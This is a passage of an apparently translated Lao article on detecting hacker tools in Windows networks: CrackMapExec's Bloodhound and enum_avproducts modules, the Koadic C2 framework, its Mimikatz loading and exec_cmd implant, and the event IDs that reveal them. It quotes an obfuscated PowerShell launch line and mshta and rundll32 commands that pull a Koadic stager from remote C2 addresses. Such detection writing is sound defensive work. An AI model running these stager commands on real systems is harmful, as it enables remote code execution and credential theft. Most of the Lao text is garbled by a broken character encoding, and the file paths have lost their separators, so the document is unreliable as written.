เบ™เบญเบเบˆเบฒเบเบ™เบฑเป‰เบ™, เบเบฒเบ™เป€เบ›เบตเบ”เบ•เบปเบง Bloodhound เปƒเบ™เป€เบ„เบทเปˆเบญเบ‡เบ‚เบญเบ‡เบœเบนเป‰เป€เบ„เบฒเบฐเบฎเป‰เบฒเบเบ—เบตเปˆเบกเบตเบเบฒเบ™เป€เบ›เบตเบ”เปƒเบŠเป‰เบเบฒเบ™เบเบงเบ”เบชเบญเบšเปเบกเปˆเบ™เบกเบฒเบžเป‰เบญเบกเบเบฑเบšเป€เบซเบ”เบเบฒเบ™เบ—เบตเปˆเบกเบต ID 4688 (เบเบฒเบ™เบชเป‰เบฒเบ‡เบ‚เบฐเบšเบงเบ™เบเบฒเบ™) เปเบฅเบฐเบŠเบทเปˆเบ‚เบฐเบšเบงเบ™เบเบฒเบ™. ยซC:WindowsSystem32cmd.exeยป. เบชเบดเปˆเบ‡เบ—เบตเปˆเป€เบ›เบฑเบ™เบ•เบฒเบชเบฑเบ‡เป€เบเบ”เปเบกเปˆเบ™ arguments เปเบ–เบงเบ„เปเบฒเบชเบฑเปˆเบ‡:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , โ€ฆ , 40,41 )-jOIN'' ) "

Enum_avproducts

เป‚เบกเบ”เบนเบ™ enum_avproducts เปเบกเปˆเบ™เบซเบ™เป‰เบฒเบชเบปเบ™เปƒเบˆเบซเบผเบฒเบเบˆเบฒเบเบˆเบธเบ”เบ‚เบญเบ‡เบเบฒเบ™เบ—เปเบฒเบ‡เบฒเบ™เปเบฅเบฐเบเบฒเบ™เบˆเบฑเบ”เบ•เบฑเป‰เบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”. WMI เบญเบฐเบ™เบธเบเบฒเบ”เปƒเบซเป‰เบ—เปˆเบฒเบ™เปƒเบŠเป‰เบžเบฒเบชเบฒเบชเบญเบšเบ–เบฒเบก WQL เป€เบžเบทเปˆเบญเบ”เบถเบ‡เบ‚เปเป‰เบกเบนเบ™เบˆเบฒเบเบงเบฑเบ”เบ–เบธ Windows เบ•เปˆเบฒเบ‡เป†, เป€เบŠเบดเปˆเบ‡เป€เบ›เบฑเบ™เบชเบดเปˆเบ‡เบˆเปเบฒเป€เบ›เบฑเบ™เบ—เบตเปˆเป‚เบกเบ”เบนเบ™ CME เบ™เบตเป‰เปƒเบŠเป‰. เบกเบฑเบ™เบชเป‰เบฒเบ‡เบเบฒเบ™เบชเบญเบšเบ–เบฒเบกเบเบฑเบšเบซเป‰เบญเบ‡เบฎเบฝเบ™ AntiSpywareProduct เปเบฅเบฐ AntiะœirusProduct เบเปˆเบฝเบงเบเบฑเบšเป€เบ„เบทเปˆเบญเบ‡เบกเบทเบ›เป‰เบญเบ‡เบเบฑเบ™เบ—เบตเปˆเบ•เบดเบ”เบ•เบฑเป‰เบ‡เบขเบนเปˆเปƒเบ™เป€เบ„เบทเปˆเบญเบ‡เบ‚เบญเบ‡เบœเบนเป‰เป€เบ„เบฒเบฐเบฎเป‰เบฒเบ. เป€เบžเบทเปˆเบญเปƒเบซเป‰เป„เบ”เป‰เบฎเบฑเบšเบ‚เปเป‰เบกเบนเบ™เบ—เบตเปˆเบˆเปเบฒเป€เบ›เบฑเบ™, เป‚เบกเบ”เบนเบ™เป€เบŠเบทเปˆเบญเบกเบ•เปเปˆเบเบฑเบš namespace rootSecurityCenter2, เบซเบผเบฑเบ‡เบˆเบฒเบเบ™เบฑเป‰เบ™เบชเป‰เบฒเบ‡เบ„เปเบฒเบ–เบฒเบก WQL เปเบฅเบฐเป„เบ”เป‰เบฎเบฑเบšเบเบฒเบ™เบ•เบญเบšเบชเบฐเบซเบ™เบญเบ‡. เปƒเบ™เบฎเบนเบš. เบฎเบนเบšเบ—เบต 9 เบชเบฐเปเบ”เบ‡เปƒเบซเป‰เป€เบซเบฑเบ™เป€เบ™เบทเป‰เบญเปƒเบ™เบ‚เบญเบ‡เบเบฒเบ™เบฎเป‰เบญเบ‡เบ‚เปเปเบฅเบฐเบเบฒเบ™เบ•เบญเบšเบชเบฐเบซเบ™เบญเบ‡เบ”เบฑเปˆเบ‡เบเปˆเบฒเบง. เปƒเบ™เบ•เบปเบงเบขเปˆเบฒเบ‡เบ‚เบญเบ‡เบžเบงเบเป€เบฎเบปเบฒ, Windows Defender เป„เบ”เป‰เบ–เบทเบเบžเบปเบšเป€เบซเบฑเบ™.

เบงเบดเบ—เบตเบเบฒเบ™เบเบงเบ”เบžเบปเบšเบเบฒเบ™เป‚เบˆเบกเบ•เบตเปƒเบ™เป‚เบ„เบ‡เบชเป‰เบฒเบ‡เบžเบทเป‰เบ™เบ–เบฒเบ™เบ‚เบญเบ‡ Windows: เบเบฒเบ™เบชเบถเบเบชเบฒเป€เบ„เบทเปˆเบญเบ‡เบกเบทเปเบฎเบเป€เบเบต
เป€เบ‚เบปเป‰เบฒ. 9. เบเบดเบ”เบˆเบฐเบเปเบฒเป€เบ„เบทเบญเบ‚เปˆเบฒเบเบ‚เบญเบ‡เป‚เบกเบ”เบนเบ™ enum_avproducts

เป€เบฅเบทเป‰เบญเบเป†, เบเบฒเบ™เบเบงเบ”เบชเบญเบš WMI (Trace WMI-Activity), เปƒเบ™เป€เบซเบ”เบเบฒเบ™เบ—เบตเปˆเป€เบˆเบปเป‰เบฒเบชเบฒเบกเบฒเบ”เบŠเบญเบเบซเบฒเบ‚เปเป‰เบกเบนเบ™เบ—เบตเปˆเป€เบ›เบฑเบ™เบ›เบฐเป‚เบซเบเบ”เบเปˆเบฝเบงเบเบฑเบšเบเบฒเบ™เบชเบญเบšเบ–เบฒเบก WQL, เบญเบฒเบ”เบˆเบฐเบ–เบทเบเบ›เบดเบ”เปƒเบŠเป‰เบ‡เบฒเบ™. เปเบ•เปˆเบ–เป‰เบฒเบกเบฑเบ™เบ–เบทเบเป€เบ›เบตเบ”เปƒเบŠเป‰, เบซเบผเบฑเบ‡เบˆเบฒเบเบ™เบฑเป‰เบ™เบ–เป‰เบฒเบชเบฐเบ„เบดเบš enum_avproducts เบ–เบทเบเปเบฅเปˆเบ™, เป€เบซเบ”เบเบฒเบ™เบ—เบตเปˆเบกเบต ID 11 เบˆเบฐเบ–เบทเบเบšเบฑเบ™เบ—เบถเบเป„เบงเป‰เบกเบฑเบ™เบˆเบฐเบกเบตเบŠเบทเปˆเบ‚เบญเบ‡เบœเบนเป‰เปƒเบŠเป‰เบ—เบตเปˆเบชเบปเปˆเบ‡เบ„เปเบฒเบฎเป‰เบญเบ‡เบ‚เปเปเบฅเบฐเบŠเบทเปˆเปƒเบ™ namespace rootSecurityCenter2.

เปเบ•เปˆเบฅเบฐเป‚เบกเบ”เบนเบ™ CME เบกเบตเบชเบดเปˆเบ‡เบ›เบฐเบ”เบดเบ”เบ‚เบญเบ‡เบ•เบปเบ™เป€เบญเบ‡, เบšเปเปˆเบงเปˆเบฒเบˆเบฐเป€เบ›เบฑเบ™เบเบฒเบ™เบชเบญเบšเบ–เบฒเบก WQL เบชเบฐเป€เบžเบฒเบฐเบซเบผเบทเบเบฒเบ™เบชเป‰เบฒเบ‡เบ›เบฐเป€เบžเบ”เบ‚เบญเบ‡เบงเบฝเบเบ‡เบฒเบ™เบชเบฐเป€เบžเบฒเบฐเปƒเบ”เบซเบ™เบถเปˆเบ‡เปƒเบ™เบ•เบฒเบ•เบฐเบฅเบฒเบ‡เบงเบฝเบเบ‡เบฒเบ™เบ—เบตเปˆเบกเบต obfuscation เปเบฅเบฐเบเบดเบ”เบˆเบฐเบเปเบฒเบชเบฐเป€เบžเบฒเบฐ Bloodhound เปƒเบ™ LDAP เปเบฅเบฐ SMB.

KOADIC

เบฅเบฑเบเบชเบฐเบ™เบฐเบ—เบตเปˆเป‚เบ”เบ”เป€เบ”เบฑเปˆเบ™เบ‚เบญเบ‡ Koadic เปเบกเปˆเบ™เบเบฒเบ™เปƒเบŠเป‰เบ•เบปเบงเปเบ›เบžเบฒเบชเบฒ JavaScript เปเบฅเบฐ VBScript เบ—เบตเปˆเบชเป‰เบฒเบ‡เบ‚เบถเป‰เบ™เปƒเบ™ Windows. เปƒเบ™เบ„เบงเบฒเบกเบซเบกเบฒเบเบ™เบตเป‰, เบกเบฑเบ™เบ›เบฐเบ•เบดเบšเบฑเบ”เบ•เบฒเบกเปเบ™เบงเป‚เบ™เป‰เบกเบเบฒเบ™เบ”เปเบฒเบฅเบปเบ‡เบŠเบตเบงเบดเบ”เบ‚เบญเบ‡เปเบœเปˆเบ™เบ”เบดเบ™ - เบ™เบฑเป‰เบ™เปเบกเปˆเบ™, เบกเบฑเบ™เบšเปเปˆเบกเบตเบเบฒเบ™เป€เบžเบดเปˆเบ‡เบžเบฒเบญเบฒเป„เบชเบžเบฒเบเบ™เบญเบเปเบฅเบฐเปƒเบŠเป‰เป€เบ„เบทเปˆเบญเบ‡เบกเบท Windows เบกเบฒเบ”เบ•เบฐเบ–เบฒเบ™. เบ™เบตเป‰โ€‹เปเบกเปˆเบ™โ€‹เป€เบ„เบทเปˆเบญเบ‡โ€‹เบกเบทโ€‹เบชเปเบฒโ€‹เบฅเบฑเบšโ€‹เบ„เปเบฒโ€‹เบชเบฑเปˆเบ‡โ€‹เปเบฅเบฐโ€‹เบเบฒเบ™โ€‹เบ„เบงเบšโ€‹เบ„เบธเบก (CnCโ€‹) เบขเปˆเบฒเบ‡โ€‹เป€เบ•เบฑเบกโ€‹เบ—เบตเปˆโ€‹, เบ™เบฑเบšโ€‹เบ•เบฑเป‰เบ‡โ€‹เปเบ•เปˆโ€‹เบซเบผเบฑเบ‡โ€‹เบˆเบฒเบโ€‹เบเบฒเบ™โ€‹เบ•เบดเบ”โ€‹เป€เบŠเบทเป‰เบญ "implantโ€‹" เบ–เบทเบโ€‹เบ•เบดเบ”โ€‹เบ•เบฑเป‰เบ‡โ€‹เปƒเบ™โ€‹เป€เบ„เบทเปˆเบญเบ‡โ€‹, เป€เบฎเบฑเบ”โ€‹เปƒเบซเป‰โ€‹เบกเบฑเบ™โ€‹เบชเบฒโ€‹เบกเบฒเบ”โ€‹เบ„เบงเบšโ€‹เบ„เบธเบกโ€‹เป„เบ”เป‰โ€‹. เป€เบ„เบทเปˆเบญเบ‡เบ”เบฑเปˆเบ‡เบเปˆเบฒเบง, เปƒเบ™เบ„เปเบฒเบชเบฑเบšเบžเบฒเบชเบฒ Koadic, เบ–เบทเบเป€เบญเบตเป‰เบ™เบงเปˆเบฒ "เบœเบตเบ”เบดเบš." เบ–เป‰เบฒเบกเบตเบชเบดเบ”เบ—เบดเบžเบดเป€เบชเบ”เบ—เบตเปˆเบšเปเปˆเบžเบฝเบ‡เบžเปเบชเปเบฒเบฅเบฑเบšเบเบฒเบ™เบ›เบฐเบ•เบดเบšเบฑเบ”เบ‡เบฒเบ™เบขเปˆเบฒเบ‡เป€เบ•เบฑเบกเบ—เบตเปˆเบขเบนเปˆเปƒเบ™เบเปˆเบฒเบเบ‚เบญเบ‡เบœเบนเป‰เบ–เบทเบเป€เบ„เบฒเบฐเบฎเป‰เบฒเบ, Koadic เบกเบตเบ„เบงเบฒเบกเบชเบฒเบกเบฒเบ”เบ—เบตเปˆเบˆเบฐเบเบปเบเบชเบนเบ‡เบžเบงเบเป€เบ‚เบปเบฒเป‚เบ”เบเปƒเบŠเป‰เป€เบ•เบฑเบเบ™เบดเบเบเบฒเบ™เบ„เบงเบšเบ„เบธเบกเบšเบฑเบ™เบŠเบตเบœเบนเป‰เปƒเบŠเป‰ (UAC bypass).

เบงเบดเบ—เบตเบเบฒเบ™เบเบงเบ”เบžเบปเบšเบเบฒเบ™เป‚เบˆเบกเบ•เบตเปƒเบ™เป‚เบ„เบ‡เบชเป‰เบฒเบ‡เบžเบทเป‰เบ™เบ–เบฒเบ™เบ‚เบญเบ‡ Windows: เบเบฒเบ™เบชเบถเบเบชเบฒเป€เบ„เบทเปˆเบญเบ‡เบกเบทเปเบฎเบเป€เบเบต
เป€เบ‚เบปเป‰เบฒ. 10. เป‚เบเบ”เบดเบ Shell

เบœเบนเป‰เบ–เบทเบเป€เบ„เบฒเบฐเบฎเป‰เบฒเบเบ•เป‰เบญเบ‡เป€เบฅเบตเปˆเบกเบ•เบปเป‰เบ™เบเบฒเบ™เบชเบทเปˆเบชเบฒเบ™เบเบฑเบšเป€เบ„เบทเปˆเบญเบ‡เปเบกเปˆเบ‚เปˆเบฒเบเบ„เปเบฒเบชเบฑเปˆเบ‡ & เบเบฒเบ™เบ„เบงเบšเบ„เบธเบก. เป€เบžเบทเปˆเบญเป€เบฎเบฑเบ”เบชเบดเปˆเบ‡เบ™เบตเป‰, เบ™เบฒเบ‡เบ•เป‰เบญเบ‡เบเบฒเบ™เบ•เบดเบ”เบ•เปเปˆเบเบฑเบš URI เบ—เบตเปˆเบเบฝเบกเป„เบงเป‰เบเปˆเบญเบ™เบซเบ™เป‰เบฒเบ™เบตเป‰เปเบฅเบฐเป„เบ”เป‰เบฎเบฑเบšเบฎเปˆเบฒเบ‡เบเบฒเบ Koadic เบ•เบปเป‰เบ™เบ•เปเป‚เบ”เบเปƒเบŠเป‰เบซเบ™เบถเปˆเบ‡เปƒเบ™ stagers. เปƒเบ™เบฎเบนเบš. เบฎเบนเบšเบ—เบต 11 เบชเบฐเปเบ”เบ‡เบ•เบปเบงเบขเปˆเบฒเบ‡เบชเปเบฒเบฅเบฑเบš mshta stager.

เบงเบดเบ—เบตเบเบฒเบ™เบเบงเบ”เบžเบปเบšเบเบฒเบ™เป‚เบˆเบกเบ•เบตเปƒเบ™เป‚เบ„เบ‡เบชเป‰เบฒเบ‡เบžเบทเป‰เบ™เบ–เบฒเบ™เบ‚เบญเบ‡ Windows: เบเบฒเบ™เบชเบถเบเบชเบฒเป€เบ„เบทเปˆเบญเบ‡เบกเบทเปเบฎเบเป€เบเบต
เป€เบ‚เบปเป‰เบฒ. 11. เบเบฒเบ™เป€เบฅเบตเปˆเบกเบ•เบปเป‰เบ™เป€เบŠเบ”เบŠเบฑเบ™เบเบฑเบšเป€เบŠเบตเบšเป€เบงเบต CnC

เบญเบตเบ‡เบ•เบฒเบกเบ•เบปเบงเปเบ›เบเบฒเบ™เบ•เบญเบšเบชเบฐเบซเบ™เบญเบ‡ WS, เบกเบฑเบ™เบˆเบฐเบเบฒเบเป€เบ›เบฑเบ™เบ—เบตเปˆเบŠเบฑเบ”เป€เบˆเบ™เบงเปˆเบฒเบเบฒเบ™เบ›เบฐเบ•เบดเบšเบฑเบ”เป€เบเบตเบ”เบ‚เบทเป‰เบ™เบœเปˆเบฒเบ™ WScript.Shell, เปเบฅเบฐเบ•เบปเบงเปเบ› STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE เบกเบตเบ‚เปเป‰เบกเบนเบ™เบ—เบตเปˆเบชเปเบฒเบ„เบฑเบ™เบเปˆเบฝเบงเบเบฑเบšเบžเบฒเบฅเบฒเบกเบดเป€เบ•เบตเบ‚เบญเบ‡เป€เบŠเบ”เบŠเบฑเบ™เปƒเบ™เบ›เบฐเบˆเบธเบšเบฑเบ™. เบ™เบตเป‰เปเบกเปˆเบ™เบ„เบนเปˆเบเบฒเบ™เบ•เบญเบšเบชเบฐเบซเบ™เบญเบ‡เบ„เปเบฒเบฎเป‰เบญเบ‡เบ‚เปเบ„เบฑเป‰เบ‡เบ—เปเบฒเบญเบดเบ”เปƒเบ™เบเบฒเบ™เป€เบŠเบทเปˆเบญเบกเบ•เปเปˆ HTTP เบเบฑเบšเป€เบ„เบทเปˆเบญเบ‡เปเบกเปˆเบ‚เปˆเบฒเบ CnC. เบเบฒเบ™เบฎเป‰เบญเบ‡เบ‚เปเบ•เปเปˆเบกเบฒเปเบกเปˆเบ™เบเปˆเบฝเบงเบ‚เป‰เบญเบ‡เป‚เบ”เบเบเบปเบ‡เบเบฑเบšเบเบฒเบ™เป€เบฎเบฑเบ”เบงเบฝเบเบ‚เบญเบ‡เป‚เบกเบ”เบนเบ™เบ—เบตเปˆเป€เบญเบตเป‰เบ™เบงเปˆเบฒ (implants). เป‚เบกเบ”เบนเบ™ Koadic เบ—เบฑเบ‡เบซเบกเบปเบ”เป€เบฎเบฑเบ”เบงเบฝเบเบžเบฝเบ‡เปเบ•เปˆเบเบฑเบšเบเบญเบ‡เบ›เบฐเบŠเบธเบกเบ—เบตเปˆเบกเบตเบเบฒเบ™เป€เบ„เบทเปˆเบญเบ™เป„เบซเบงเบเบฑเบš CnC.

เบกเบดเบกเบตเบเบตเบ—เบฒ

เบ„เบทเบเบฑเบ™เบเบฑเบš CME เป€เบฎเบฑเบ”เบงเบฝเบเบเบฑเบš Bloodhound, Koadic เป€เบฎเบฑเบ”เบงเบฝเบเบเบฑเบš Mimikatz เป€เบ›เบฑเบ™เป‚เบ„เบ‡เบเบฒเบ™เปเบเบเบ•เปˆเบฒเบ‡เบซเบฒเบเปเบฅเบฐเบกเบตเบซเบผเบฒเบเบงเบดเบ—เบตเบ—เบตเปˆเบˆเบฐเป€เบ›เบตเบ”เบ•เบปเบงเบกเบฑเบ™. เบ‚เป‰เบฒเบ‡เบฅเบธเปˆเบกเบ™เบตเป‰เปเบกเปˆเบ™เบ„เบนเปˆเบ„เปเบฒเบฎเป‰เบญเบ‡เบ‚เปเบเบฒเบ™เบ•เบญเบšเบชเบฐเบซเบ™เบญเบ‡เบชเปเบฒเบฅเบฑเบšเบเบฒเบ™เบ”เบฒเบงเป‚เบซเบผเบ” Mimikatz implant.

เบงเบดเบ—เบตเบเบฒเบ™เบเบงเบ”เบžเบปเบšเบเบฒเบ™เป‚เบˆเบกเบ•เบตเปƒเบ™เป‚เบ„เบ‡เบชเป‰เบฒเบ‡เบžเบทเป‰เบ™เบ–เบฒเบ™เบ‚เบญเบ‡ Windows: เบเบฒเบ™เบชเบถเบเบชเบฒเป€เบ„เบทเปˆเบญเบ‡เบกเบทเปเบฎเบเป€เบเบต
เป€เบ‚เบปเป‰เบฒ. 12. เป‚เบญเบ™ Mimikatz เป„เบ› Koadic

เบ—เปˆเบฒเบ™เบชเบฒเบกเบฒเบ”เป€เบšเบดเปˆเบ‡เบงเปˆเบฒเบฎเบนเบšเปเบšเบš URI เปƒเบ™เบ„เปเบฒเบฎเป‰เบญเบ‡เบ‚เปเบกเบตเบเบฒเบ™เบ›เปˆเบฝเบ™เปเบ›เบ‡เปเบ™เบงเปƒเบ”. เปƒเบ™เบ›เบฑเบ”เบˆเบธเบšเบฑเบ™เบกเบฑเบ™เบกเบตเบ„เปˆเบฒเบชเปเบฒเบฅเบฑเบšเบ•เบปเบงเปเบ› csrf, เป€เบŠเบดเปˆเบ‡เบฎเบฑเบšเบœเบดเบ”เบŠเบญเบšเบชเปเบฒเบฅเบฑเบšเป‚เบกเบ”เบนเบ™เบ—เบตเปˆเป€เบฅเบทเบญเบ. เบขเปˆเบฒเป€เบญเบปเบฒเปƒเบˆเปƒเบชเปˆเบเบฑเบšเบŠเบทเปˆเบ‚เบญเบ‡เบ™เบฒเบ‡; เบžเบงเบเป€เบฎเบปเบฒเบ—เบธเบเบ„เบปเบ™เบฎเบนเป‰เบงเปˆเบฒ CSRF เบกเบฑเบเบˆเบฐเป€เบ‚เบปเป‰เบฒเปƒเบˆเปเบ•เบเบ•เปˆเบฒเบ‡เบเบฑเบ™. เบเบฒเบ™เบ•เบญเบšเบชเบฐเบซเบ™เบญเบ‡เปเบกเปˆเบ™เบ•เบปเบงเบซเบผเบฑเบเบ”เบฝเบงเบเบฑเบ™เบ‚เบญเบ‡ Koadic, เป€เบŠเบดเปˆเบ‡เบฅเบฐเบซเบฑเบ”เบ—เบตเปˆเบเปˆเบฝเบงเบ‚เป‰เบญเบ‡เบเบฑเบš Mimikatz เป„เบ”เป‰เบ–เบทเบเป€เบžเบตเปˆเบก. เบกเบฑเบ™เบ‚เป‰เบญเบ™เบ‚เป‰เบฒเบ‡เปƒเบซเบเปˆ, เบ”เบฑเปˆเบ‡เบ™เบฑเป‰เบ™เปƒเบซเป‰เบžเบงเบเป€เบฎเบปเบฒเป€เบšเบดเปˆเบ‡เบˆเบธเบ”เบชเปเบฒเบ„เบฑเบ™. เปƒเบ™เบ—เบตเปˆเบ™เบตเป‰เบžเบงเบเป€เบฎเบปเบฒเบกเบตเบซเป‰เบญเบ‡เบชเบฐเบซเบกเบธเบ” Mimikatz เบ—เบตเปˆเบ–เบทเบเป€เบ‚เบปเป‰เบฒเบฅเบฐเบซเบฑเบ”เปƒเบ™ base64, เบซเป‰เบญเบ‡เบฎเบฝเบ™ .NET serialized เบ—เบตเปˆเบˆเบฐเปƒเบชเปˆเบกเบฑเบ™, เปเบฅเบฐเบเบฒเบ™เป‚เบ•เป‰เบ–เบฝเบ‡เบ—เบตเปˆเบˆเบฐเป€เบ›เบตเบ”เบ•เบปเบง Mimikatz. เบœเบปเบ™เป„เบ”เป‰เบฎเบฑเบšเบเบฒเบ™เบ›เบฐเบ•เบดเบšเบฑเบ”เป„เบ”เป‰เบ–เบทเบเบชเบปเปˆเบ‡เบœเปˆเบฒเบ™เป€เบ„เบทเบญเบ‚เปˆเบฒเบเปƒเบ™เบ‚เปเป‰เบ„เบงเบฒเบกเบ—เบตเปˆเบŠเบฑเบ”เป€เบˆเบ™.

เบงเบดเบ—เบตเบเบฒเบ™เบเบงเบ”เบžเบปเบšเบเบฒเบ™เป‚เบˆเบกเบ•เบตเปƒเบ™เป‚เบ„เบ‡เบชเป‰เบฒเบ‡เบžเบทเป‰เบ™เบ–เบฒเบ™เบ‚เบญเบ‡ Windows: เบเบฒเบ™เบชเบถเบเบชเบฒเป€เบ„เบทเปˆเบญเบ‡เบกเบทเปเบฎเบเป€เบเบต
เป€เบ‚เบปเป‰เบฒ. 13. เบœเบปเบ™เบ‚เบญเบ‡เบเบฒเบ™เปเบฅเปˆเบ™ Mimikatz เปƒเบ™เป€เบ„เบทเปˆเบญเบ‡เบซเปˆเบฒเบ‡เป„เบเบชเบญเบเบซเบผเบตเบ

Exec_cmd

Koadic เบเบฑเบ‡เบกเบตเป‚เบกเบ”เบนเบ™เบ—เบตเปˆเบชเบฒเบกเบฒเบ”เบ›เบฐเบ•เบดเบšเบฑเบ”เบ„เปเบฒเบชเบฑเปˆเบ‡เบˆเบฒเบเป„เบฅเบเบฐเป„เบ. เปƒเบ™เบ—เบตเปˆเบ™เบตเป‰เบžเบงเบเป€เบฎเบปเบฒเบˆเบฐเป€เบซเบฑเบ™เบงเบดเบ—เบตเบเบฒเบ™เบชเป‰เบฒเบ‡ URI เบ”เบฝเบงเบเบฑเบ™เปเบฅเบฐเบ•เบปเบงเปเบ› sid เปเบฅเบฐ csrf เบ—เบตเปˆเบ„เบธเป‰เบ™เป€เบ„เบตเบ. เปƒเบ™เบเปเบฅเบฐเบ™เบตเบ‚เบญเบ‡เป‚เบกเบ”เบนเบ™ exec_cmd, เบฅเบฐเบซเบฑเบ”เบ–เบทเบเป€เบžเบตเปˆเบกเป€เบ‚เบปเป‰เบฒเป„เบ›เปƒเบ™เบฎเปˆเบฒเบ‡เบเบฒเบเบ—เบตเปˆเบชเบฒเบกเบฒเบ”เบ›เบฐเบ•เบดเบšเบฑเบ”เบ„เปเบฒเบชเบฑเปˆเบ‡เบ‚เบญเบ‡เปเบเบฐ. เบ‚เป‰เบฒเบ‡เบฅเบธเปˆเบกเบ™เบตเป‰เปเบกเปˆเบ™เบชเบฐเปเบ”เบ‡เปƒเบซเป‰เป€เบซเบฑเบ™เบฅเบฐเบซเบฑเบ”เบ”เบฑเปˆเบ‡เบเปˆเบฒเบงเบ—เบตเปˆเบกเบตเบขเบนเปˆเปƒเบ™เบเบฒเบ™เบ•เบญเบšเบชเบฐเบซเบ™เบญเบ‡ HTTP เบ‚เบญเบ‡เป€เบ„เบทเปˆเบญเบ‡เปเบกเปˆเบ‚เปˆเบฒเบ CnC.

เบงเบดเบ—เบตเบเบฒเบ™เบเบงเบ”เบžเบปเบšเบเบฒเบ™เป‚เบˆเบกเบ•เบตเปƒเบ™เป‚เบ„เบ‡เบชเป‰เบฒเบ‡เบžเบทเป‰เบ™เบ–เบฒเบ™เบ‚เบญเบ‡ Windows: เบเบฒเบ™เบชเบถเบเบชเบฒเป€เบ„เบทเปˆเบญเบ‡เบกเบทเปเบฎเบเป€เบเบต
เป€เบ‚เบปเป‰เบฒ. 14. เบฅเบฐเบซเบฑเบ” Implant exec_cmd

เบ•เบปเบงเปเบ› GAWTUUGCFI เบ—เบตเปˆเบกเบตเบ„เบธเบ™เบฅเบฑเบเบชเบฐเบ™เบฐ WS เบ—เบตเปˆเบ„เบธเป‰เบ™เป€เบ„เบตเบเปเบกเปˆเบ™เบ•เป‰เบญเบ‡เบเบฒเบ™เบชเปเบฒเบฅเบฑเบšเบเบฒเบ™เบ›เบฐเบ•เบดเบšเบฑเบ”เบฅเบฐเบซเบฑเบ”. เบ”เป‰เบงเบเบเบฒเบ™เบŠเปˆเบงเบเป€เบซเบผเบทเบญเบ‚เบญเบ‡เบกเบฑเบ™, implant เป€เบญเบตเป‰เบ™เบงเปˆเบฒ shell, เบเบฒเบ™เบ›เบธเบ‡เปเบ•เปˆเบ‡เบชเบญเบ‡เบชเบฒเบ‚เบฒเบ‚เบญเบ‡เบฅเบฐเบซเบฑเบ” - shell.exec เบเบฑเบšเบเบฒเบ™เบเบฑเบšเบ„เบทเบ™เบ‚เบญเบ‡เบ™เป‰เปเบฒเบ‚เปเป‰เบกเบนเบ™เบœเบปเบ™เบœเบฐเบฅเบดเบ”เปเบฅเบฐ shell.run เป‚เบ”เบเบšเปเปˆเบกเบตเบเบฒเบ™เบเบฑเบšเบ„เบทเบ™.

Koadic เบšเปเปˆเปเบกเปˆเบ™เป€เบ„เบทเปˆเบญเบ‡เบกเบทเบ—เบปเปˆเบงเป„เบ›, เปเบ•เปˆเบกเบฑเบ™เบกเบตเบชเบดเปˆเบ‡เบ›เบฐเบ”เบดเบ”เบ‚เบญเบ‡เบ•เบปเบ™เป€เบญเบ‡เป‚เบ”เบเบ—เบตเปˆเบกเบฑเบ™เบชเบฒเบกเบฒเบ”เบžเบปเบšเป€เบซเบฑเบ™เบขเบนเปˆเปƒเบ™เบเบฒเบ™เบˆเบฐเบฅเบฒเบˆเบญเบ™เบ—เบตเปˆเบ–เบทเบเบ•เป‰เบญเบ‡:

  • เบเบฒเบ™เบชเป‰เบฒเบ‡เปเบšเบšเบžเบดเป€เบชเบ”เบ‚เบญเบ‡เบเบฒเบ™เบฎเป‰เบญเบ‡เบ‚เป HTTP,
  • เปƒเบŠเป‰ winHttpRequests API,
  • เบเบฒเบ™เบชเป‰เบฒเบ‡เบงเบฑเบ”เบ–เบธ WScript.Shell เบœเปˆเบฒเบ™ ActiveXObject,
  • เบฎเปˆเบฒเบ‡เบเบฒเบเบ‚เบฐเบซเบ™เบฒเบ”เปƒเบซเบเปˆเบ—เบตเปˆเบชเบฒเบกเบฒเบ”เบ›เบฐเบ•เบดเบšเบฑเบ”เป„เบ”เป‰.

เบเบฒเบ™โ€‹เป€เบŠเบทเปˆเบญเบกโ€‹เบ•เปเปˆโ€‹เป€เบšเบทเป‰เบญเบ‡โ€‹เบ•เบปเป‰เบ™โ€‹เปเบกเปˆเบ™โ€‹เป„เบ”เป‰โ€‹เป€เบฅเบตเปˆเบกโ€‹เบ•เบปเป‰เบ™โ€‹เป‚เบ”เบ stagerโ€‹, เบชเบฐโ€‹เบ™เบฑเป‰เบ™โ€‹เบกเบฑเบ™โ€‹เป€เบ›เบฑเบ™โ€‹เป„เบ›โ€‹เป„เบ”เป‰โ€‹เบ—เบตเปˆโ€‹เบˆเบฐโ€‹เบเบงเบ”โ€‹เบžเบปเบšโ€‹เบเบดเบ”โ€‹เบˆเบฐโ€‹เบเปเบฒโ€‹เบ‚เบญเบ‡โ€‹เบ•เบปเบ™โ€‹เป‚เบ”เบโ€‹เบœเปˆเบฒเบ™โ€‹เป€เบซเบ”โ€‹เบเบฒเบ™ Windowsโ€‹. เบชเปเบฒเบฅเบฑเบš mshta, เบ™เบตเป‰เปเบกเปˆเบ™เป€เบซเบ”เบเบฒเบ™ 4688, เป€เบŠเบดเปˆเบ‡เบŠเบตเป‰เปƒเบซเป‰เป€เบซเบฑเบ™เบเบฒเบ™เบชเป‰เบฒเบ‡เบ‚เบฐเบšเบงเบ™เบเบฒเบ™เบ—เบตเปˆเบกเบตเบ„เบธเบ™เบฅเบฑเบเบชเบฐเบ™เบฐเป€เบฅเบตเปˆเบกเบ•เบปเป‰เบ™:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

เปƒเบ™เบ‚เบฐเบ™เบฐเบ—เบตเปˆ Koadic เบเปเบฒเบฅเบฑเบ‡เปเบฅเปˆเบ™, เบ—เปˆเบฒเบ™เบชเบฒเบกเบฒเบ”เป€เบšเบดเปˆเบ‡เป€เบซเบ”เบเบฒเบ™ 4688 เบญเบทเปˆเบ™เป†เบ—เบตเปˆเบกเบตเบ„เบธเบ™เบฅเบฑเบเบชเบฐเบ™เบฐเบ—เบตเปˆเบกเบตเบฅเบฑเบเบชเบฐเบ™เบฐเบขเปˆเบฒเบ‡เบชเบปเบกเบšเบนเบ™เปเบšเบš:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
